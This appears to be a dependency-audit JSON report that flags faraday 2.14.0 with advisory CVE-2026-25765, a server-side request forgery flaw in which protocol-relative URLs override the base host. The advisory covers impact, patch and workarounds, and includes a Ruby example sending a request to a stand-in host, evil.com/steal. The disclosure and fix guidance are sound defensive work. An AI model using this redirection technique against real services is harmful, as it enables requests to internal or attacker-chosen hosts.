{"version":"0.9.3","created_at":"2026-02-12 08:49:53 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(%r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]}